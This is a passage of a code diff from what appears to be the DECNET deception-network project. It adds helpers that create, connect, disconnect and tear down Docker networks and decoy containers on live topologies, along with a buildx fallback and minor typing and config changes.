    _save_state(fleet_config, compose_path)
    _write_compose(fleet_config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL

    db_row = {
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    }
    await repo.upsert_fleet_decky(db_row)

    if not apply:
        return

    worker_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if worker_uuid:
        await _redispatch_fleet_shard(repo, worker_uuid)
        return

    container = f"{decky_name}-{service_name}"

    # Docker Compose tracks the previous container by ID. If that container
    # was already removed (or renamed during a prior failed deploy),
    # --force-recreate fails with "No such container". Removing it by name
    # first lets Compose start from a clean slate. The result of the rm is
    # deliberately ignored.
    def _remove_stale():
        return subprocess.run(  # nosec B603 B607
            ["docker", "rm", "-f", container],
            capture_output=True,
        )

    def _recreate():
        return _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_remove_stale)
    await anyio.to_thread.run_sync(_recreate)
|
||||||
|
|
||||||
|
|
||||||
|
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky.

    Dispatches to the topology or fleet helper, which stops and removes
    the service container, stores the new services list and re-renders
    the compose file so a later ``up -d`` does not bring the service back.
    Publishes ``decky.<name>.service.removed`` afterwards.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: ``decky_kind`` is ``"topology"`` without a
            ``topology_id``. Subclasses signal not-found and conflict
            cases.
    """
    if decky_kind not in ("topology", "fleet"):  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    if decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    else:
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED)
    event_body = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_body)

    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
|
||||||
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
|
|||||||
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
|
||||||
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
|
||||||
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
|
||||||
|
# Bind address for the master-side swarm controller. Loopback by default —
|
||||||
|
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
|
||||||
|
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
|
||||||
|
# swarmctl-host in /etc/decnet/decnet.ini.
|
||||||
|
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
|
||||||
|
|
||||||
# Ingester batching: how many log rows to accumulate per commit, and the
|
# Ingester batching: how many log rows to accumulate per commit, and the
|
||||||
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
# max wait (ms) before flushing a partial batch. Larger batches reduce
|
||||||
|
|||||||
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
|
|||||||
from decnet.geoip.lookup import Lookup
|
from decnet.geoip.lookup import Lookup
|
||||||
from decnet.geoip.paths import ensure_root
|
from decnet.geoip.paths import ensure_root
|
||||||
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
|
||||||
from decnet.geoip.rir.parse import parse_file
|
from decnet.geoip.rir.parse import Range, parse_file
|
||||||
|
|
||||||
logger = logging.getLogger("decnet.geoip.rir.provider")
|
logger = logging.getLogger("decnet.geoip.rir.provider")
|
||||||
|
|
||||||
@@ -45,7 +45,7 @@ class RirProvider(Provider):
|
|||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
|
||||||
|
|
||||||
ranges = []
|
ranges: list[Range] = []
|
||||||
for path in self.data_paths():
|
for path in self.data_paths():
|
||||||
if not path.exists():
|
if not path.exists():
|
||||||
continue
|
continue
|
||||||
|
|||||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
|||||||
self.component = component
|
self.component = component
|
||||||
|
|
||||||
def filter(self, record: logging.LogRecord) -> bool:
|
def filter(self, record: logging.LogRecord) -> bool:
|
||||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
record.decnet_component = self.component
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
|||||||
span = trace.get_current_span()
|
span = trace.get_current_span()
|
||||||
ctx = span.get_span_context()
|
ctx = span.get_span_context()
|
||||||
if ctx and ctx.trace_id:
|
if ctx and ctx.trace_id:
|
||||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
record.otel_span_id = format(ctx.span_id, "016x")
|
||||||
else:
|
else:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
except Exception:
|
except Exception:
|
||||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
record.otel_trace_id = "0"
|
||||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
record.otel_span_id = "0"
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
|||||||
return 0
|
return 0
|
||||||
drained = 0
|
drained = 0
|
||||||
for topo in pending:
|
for topo in pending:
|
||||||
tid = topo["id"]
|
tid = topo.id
|
||||||
try:
|
try:
|
||||||
await _deployer.resync_agent_topology(repo, tid)
|
await _deployer.resync_agent_topology(repo, tid)
|
||||||
await repo.set_topology_resync(tid, False)
|
await repo.set_topology_resync(tid, False)
|
||||||
drained += 1
|
drained += 1
|
||||||
log.info("topology %s resynced to agent %s",
|
log.info("topology %s resynced to agent %s",
|
||||||
tid, topo.get("target_host_uuid"))
|
tid, topo.target_host_uuid)
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
log.warning(
|
log.warning(
|
||||||
"topology %s resync failed (will retry): %s", tid, exc,
|
"topology %s resync failed (will retry): %s", tid, exc,
|
||||||
|
|||||||
@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.

    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands. Skips when:

    * the topology does not exist,
    * the topology is not active/degraded (a pending topology gets its
      networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host materialisation
      isn't implemented; the agent's apply_topology RPC re-renders the
      whole compose at next push).

    Any failure of the docker SDK or the networking primitives is logged
    and not re-raised, because the DB row is the source of truth. That
    now includes a failure to obtain the docker client itself. The client
    is closed before returning.

    Args:
        repo: Repository providing ``get_topology`` (and used by
            ``hydrate``).
        topology_id: Topology whose LAN set changed.
        created: ``(name, subnet, is_dmz)`` of a LAN to materialise. The
            bridge is created as internal unless ``is_dmz`` is true.
        removed: Name of a LAN whose bridge should be removed.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    status = topology.status
    if status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return

    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose

    client = None
    try:
        # Inside the try so an unreachable daemon is logged like every
        # other docker failure instead of propagating to the caller.
        client = docker.from_env()

        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.

        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )

        # Re-render compose so the file on disk matches the DB. Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
    finally:
        if client is not None:
            # Release the client's connection pool; a failure here is
            # best-effort cleanup and must not mask the outcome above.
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug(
                    "live LAN op: docker client close failed topology=%s: %s",
                    topology_id, exc,
                )
|
||||||
|
|
||||||
|
|
||||||
|
def _is_buildx_wedge(exc: BaseException) -> bool:
    """True when *exc* looks like the buildx EROFS wedge.

    Both the structured ``stderr`` attribute (as on CalledProcessError)
    and ``str(exc)`` are searched, because ``_compose_with_retry`` raises
    a synthetic CalledProcessError whose ``stderr`` contains the recovery
    hint (which preserves the wedge signatures verbatim).

    The comparison is case-insensitive on both sides. The haystack is
    lower-cased, so the signatures are lower-cased too; without that, a
    signature containing an upper-case character could never match. A
    ``bytes`` stderr is decoded rather than stringified via ``str()``.
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )

    raw_stderr = getattr(exc, "stderr", None)
    if isinstance(raw_stderr, (bytes, bytearray)):
        stderr = bytes(raw_stderr).decode("utf-8", errors="replace")
    elif raw_stderr:
        stderr = str(raw_stderr)
    else:
        stderr = ""

    haystack = (stderr + " " + str(exc)).lower()
    return (
        _BUILDX_WEDGE_SIGNATURE.lower() in haystack
        and _BUILDX_EROFS_SIGNATURE.lower() in haystack
    )
|
||||||
|
|
||||||
|
|
||||||
|
async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
) -> None:
    """Run a compose command, retrying once on the legacy builder after a wedge.

    The first attempt goes through ``_compose_with_retry`` unchanged. If it
    raises and ``_is_buildx_wedge`` recognises the failure, a warning with
    recovery instructions is logged and the same command is run a second
    time with ``DOCKER_BUILDKIT=0`` in its environment. Any other failure
    is re-raised untouched, and a failure of the second attempt propagates
    to the caller.

    *label* only appears in the warning line, so an operator can trace the
    fall-back to the operation that triggered it.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry

    def _default_builder() -> None:
        _compose_with_retry(*args, compose_file=compose_file)

    def _legacy_builder() -> None:
        _compose_with_retry(
            *args, compose_file=compose_file,
            env={"DOCKER_BUILDKIT": "0"},
        )

    try:
        await anyio.to_thread.run_sync(_default_builder)
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder). Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    else:
        return

    # The retry runs after the except block has finished, so a second
    # failure is not chained underneath the first one's traceback.
    await anyio.to_thread.run_sync(_legacy_builder)
|
||||||
|
|
||||||
|
|
||||||
|
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """List the compose service names belonging to one decky.

    The result always starts with the base (``decky_name``), followed by
    ``"<decky_name>-<service>"`` for each entry of *services* in order.
    Services whose registry entry has ``fleet_singleton`` set are left out:
    they run once fleet-wide and have no per-decky compose entry.
    """
    from decnet.services.registry import get_service

    targets = [decky_name]
    for svc_name in services:
        registered = True
        try:
            svc = get_service(svc_name)
        except KeyError:
            # Not in the registry. Keep the name anyway so compose reports
            # it as an unknown service instead of it vanishing silently.
            registered = False
        if registered and svc.fleet_singleton:
            continue
        targets.append(f"{decky_name}-{svc_name}")
    return targets
|
||||||
|
|
||||||
|
|
||||||
|
async def _live_topology_or_none(
    repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
    """Fetch the topology, but only if live materialisation applies to it.

    ``None`` is returned — letting callers bail out with one ``if`` — when:

    * ``repo.get_topology`` finds nothing;
    * the status is anything other than ``active`` / ``degraded``;
    * ``target_host_uuid`` is set, i.e. the topology is pinned to an agent
      (this case is also logged at INFO).

    Otherwise the object returned by the repo is handed back unchanged.
    """
    # NOTE(review): the annotation says dict, but the body reads
    # ``.status`` / ``.target_host_uuid`` as attributes — confirm the real
    # return type of ``repo.get_topology``.
    topology = await repo.get_topology(topology_id)
    if topology is None or topology.status not in ("active", "degraded"):
        return None
    if not topology.target_host_uuid:
        return topology
    _log.info(
        "live decky op skipped (agent-pinned topology=%s); "
        "next agent push will reconcile",
        topology_id,
    )
    return None
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Rewrite the topology's compose file from what the DB currently holds.

    Does nothing when ``hydrate`` returns ``None``. A failure while
    resolving the path or writing the file is logged as a warning and
    swallowed; an exception raised by ``hydrate`` itself is not caught here.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose

    hydrated = await hydrate(repo, topology_id)
    if hydrated is not None:
        try:
            destination = _topology_compose_path(topology_id)
            write_topology_compose(hydrated, destination)
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live op: compose re-render failed topology=%s: %s",
                topology_id, exc,
            )
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
    """Bring up one decky (base + per-decky services) on a live topology.

    The compose file is re-rendered first so it lists the new decky, then
    ``up -d --no-deps --build`` is run for the decky's targets through the
    buildkit-fallback wrapper.

    Returns ``True`` only when that compose run completed without raising.
    Returns ``False`` when the topology is not eligible for live
    materialisation or when compose failed; the failure is logged, not
    re-raised.
    """
    eligible = await _live_topology_or_none(repo, topology_id)
    if eligible is None:
        return False

    from decnet.engine.deployer import _topology_compose_path

    await _rerender_compose(repo, topology_id)
    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)

    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *targets,
            compose_file=compose_path,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
        return False
    return True
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_remove(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
    """Stop and force-remove one decky's containers, then re-render compose.

    No-op when the topology is not eligible for live materialisation.
    ``compose stop`` and ``compose rm -f`` are each attempted independently:
    a failure of either is logged as a warning and the next step still runs.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    targets = _decky_targets(decky_name, services)
    compose_path = _topology_compose_path(topology_id)

    # Both commands must run against the *old* compose file: once it is
    # re-rendered the decky is no longer listed and compose would have
    # nothing to act on.
    steps = (
        (
            ("stop",),
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
        ),
        (
            ("rm", "-f"),
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
        ),
    )
    for verb, failure_fmt in steps:
        def _run(verb: tuple = verb) -> None:
            _compose(*verb, *targets, compose_file=compose_path)

        try:
            await anyio.to_thread.run_sync(_run)
        except Exception as exc:  # noqa: BLE001
            _log.warning(failure_fmt, topology_id, decky_name, exc)

    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
    """SDK ``network.connect`` to multi-home a running base container.

    Service containers share the base's netns via ``network_mode:
    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
    the base alone gives every service container the new interface for
    free — we don't need to iterate.

    No-op when the topology is not eligible for live materialisation.
    Best-effort: every Docker failure is logged and swallowed, and the
    compose file is re-rendered afterwards regardless of the outcome.
    An "already connected" style API error is treated as success.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)

    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.connect(container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        # Idempotency — already on the network is fine.
        msg = str(exc).lower()
        already_attached = "already" in msg or (
            "endpoint" in msg and "exists" in msg
        )
        if already_attached:
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # Release the client's connection pool; a fresh client is created
        # on every call, so leaving it open leaks sockets until GC.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001 — cleanup stays best-effort
                _log.debug(
                    "live attach_decky: docker client close failed: %s", exc,
                )

    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
    """SDK ``network.disconnect`` to drop a multi-home edge.

    No-op when the topology is not eligible for live materialisation.
    Best-effort: every Docker failure is logged and swallowed, and the
    compose file is re-rendered afterwards regardless of the outcome.
    An API error whose message contains "not connected" or "no such" is
    treated as "already detached" and only logged at INFO.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)

    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.disconnect(container)
    except docker.errors.APIError as exc:
        msg = str(exc).lower()
        if "not connected" in msg or "no such" in msg:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        # Release the client's connection pool; a fresh client is created
        # on every call, so leaving it open leaks sockets until GC.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001 — cleanup stays best-effort
                _log.debug(
                    "live detach_decky: docker client close failed: %s", exc,
                )

    await _rerender_compose(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
) -> None:
    """Start newly added and tear down removed service containers of a decky.

    Sibling containers and the base are left alone. Returns immediately
    when both lists are empty or the topology is not eligible for live
    materialisation. The compose file is re-rendered first, then:

    * added services get ``up -d --no-deps --build`` through the
      buildkit-fallback wrapper (failure logged at ERROR);
    * removed services get ``stop`` followed by ``rm -f``; each step is
      attempted even if the previous one failed (failure logged at WARNING).

    No exception from the compose calls escapes this function.
    """
    if not (added or removed):
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    # _decky_targets always puts the base first; slice it off so only the
    # per-service containers are touched.
    add_targets = _decky_targets(decky_name, list(added))[1:]
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )

    rm_targets = _decky_targets(decky_name, list(removed))[1:]
    if rm_targets:
        for action_name, verb in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
            def _run(verb: tuple = verb) -> None:
                _compose(*verb, *rm_targets, compose_file=compose_path)

            try:
                await anyio.to_thread.run_sync(_run)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live update_decky %s failed topology=%s decky=%s: %s",
                    action_name, topology_id, decky_name, exc,
                )
|
||||||
|
|
||||||
|
|
||||||
|
async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
) -> None:
    """Force-recreate only the decky's base container (forwards_l3 flips).

    DESTRUCTIVE: whatever state lives inside the base container is lost.
    This helper does no confirmation of its own — the caller must gate it
    on an explicit operator-supplied ``force=true``.

    No-op when the topology is not eligible for live materialisation. The
    compose file is re-rendered before ``up -d --no-deps --force-recreate``
    runs; a compose failure is logged at ERROR and swallowed.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )

    await _rerender_compose(repo, topology_id)
    compose_path = _topology_compose_path(topology_id)

    def _recreate() -> None:
        _compose_with_retry(
            "up", "-d", "--no-deps", "--force-recreate", decky_name,
            compose_file=compose_path,
        )

    try:
        await anyio.to_thread.run_sync(_recreate)
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
|
||||||
|
|
||||||
|
|
||||||
# ------------------------------------------------------------------- ops
|
# ------------------------------------------------------------------- ops
|
||||||
|
|
||||||
|
|
||||||
@@ -131,6 +588,16 @@ async def apply_add_lan(
|
|||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Live materialisation: when the topology is active/degraded, create
|
||||||
|
# the docker bridge network now and re-render the per-topology
|
||||||
|
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||||
|
# services map. Pending topologies skip this — the next deploy
|
||||||
|
# creates everything from scratch. Agent-pinned topologies also
|
||||||
|
# skip; live editing on agents is its own routing problem.
|
||||||
|
await _materialise_lan_change(
|
||||||
|
repo, topology_id, created=(name, subnet, is_dmz),
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -150,7 +617,17 @@ async def apply_remove_lan(
|
|||||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||||
)
|
)
|
||||||
await repo.delete_lan(lan["id"])
|
lan_name = lan["name"]
|
||||||
|
# enforce_pending=False: the mutator queue is the live-editing
|
||||||
|
# surface, gated on topology status by us before we got here. The
|
||||||
|
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||||
|
# bypass it.
|
||||||
|
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||||
|
|
||||||
|
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||||
|
# docker bridge and re-render compose so a future redeploy doesn't
|
||||||
|
# try to wire deckies into a network that no longer exists.
|
||||||
|
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -204,11 +681,12 @@ async def apply_add_decky(
|
|||||||
if forwards_l3:
|
if forwards_l3:
|
||||||
decky_config["forwards_l3"] = True
|
decky_config["forwards_l3"] = True
|
||||||
|
|
||||||
|
services_list = list(payload.get("services", []))
|
||||||
decky_uuid = await repo.add_topology_decky(
|
decky_uuid = await repo.add_topology_decky(
|
||||||
{
|
{
|
||||||
"topology_id": topology_id,
|
"topology_id": topology_id,
|
||||||
"name": name,
|
"name": name,
|
||||||
"services": list(payload.get("services", [])),
|
"services": services_list,
|
||||||
"decky_config": decky_config,
|
"decky_config": decky_config,
|
||||||
"x": payload.get("x"),
|
"x": payload.get("x"),
|
||||||
"y": payload.get("y"),
|
"y": payload.get("y"),
|
||||||
@@ -223,6 +701,25 @@ async def apply_add_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: spawn the new decky's containers without
|
||||||
|
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||||
|
# see _live_topology_or_none.
|
||||||
|
spawned = await _materialise_decky_spawn(
|
||||||
|
repo, topology_id, name, services_list,
|
||||||
|
)
|
||||||
|
# Flip the row's state to 'running' on success so the dashboard's
|
||||||
|
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||||
|
# stays at the default 'pending' forever; the deployer's full
|
||||||
|
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||||
|
if spawned:
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
_log.warning(
|
||||||
|
"live add_decky: state flip to running failed "
|
||||||
|
"topology=%s decky=%s: %s",
|
||||||
|
topology_id, name, exc,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -286,6 +783,16 @@ async def apply_attach_decky(
|
|||||||
"forwards_l3": forwards_l3,
|
"forwards_l3": forwards_l3,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
# Live materialisation: SDK network.connect on the base container.
|
||||||
|
# Service containers share the base's netns via network_mode:
|
||||||
|
# service:<base>, so they inherit the new interface — only the base
|
||||||
|
# needs the connect.
|
||||||
|
await _materialise_decky_connect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
ipv4_address=ip,
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -329,7 +836,15 @@ async def apply_detach_decky(
|
|||||||
await repo.update_topology_decky(
|
await repo.update_topology_decky(
|
||||||
decky["uuid"], {"decky_config": new_cfg}
|
decky["uuid"], {"decky_config": new_cfg}
|
||||||
)
|
)
|
||||||
await repo.delete_topology_edge(edge["id"])
|
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||||
|
# Live materialisation: SDK network.disconnect on the base
|
||||||
|
# container. Service containers automatically lose visibility into
|
||||||
|
# the LAN because they share the base's netns.
|
||||||
|
await _materialise_decky_disconnect(
|
||||||
|
repo, topology_id,
|
||||||
|
decky_name=decky["decky_config"]["name"],
|
||||||
|
lan_name=lan["name"],
|
||||||
|
)
|
||||||
await _assert_valid_after(repo, topology_id)
|
await _assert_valid_after(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
@@ -340,7 +855,15 @@ async def apply_remove_decky(
|
|||||||
decky = _decky_by_name(hydrated, payload["decky"])
|
decky = _decky_by_name(hydrated, payload["decky"])
|
||||||
if decky is None:
|
if decky is None:
|
||||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||||
await repo.delete_topology_decky(decky["uuid"])
|
decky_name = decky["decky_config"]["name"]
|
||||||
|
services_list = list(decky.get("services") or [])
|
||||||
|
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||||
|
# Live materialisation: stop + rm -f the decky's containers. We
|
||||||
|
# capture decky_name + services BEFORE the delete so the helper
|
||||||
|
# has the targets even though the row is gone.
|
||||||
|
